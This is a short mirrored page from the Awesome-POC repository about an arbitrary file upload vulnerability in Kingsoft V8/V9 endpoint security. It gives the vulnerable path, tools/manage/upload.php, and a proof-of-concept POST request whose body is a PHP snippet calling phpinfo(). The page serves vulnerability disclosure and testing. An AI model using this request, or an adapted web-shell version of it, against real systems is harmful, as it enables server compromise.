admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

350 B
Raw Blame History

金山 V8 V9 终端安全系统 文件上传漏洞

漏洞描述

参考链接:

漏洞复现

在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。

poc

POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>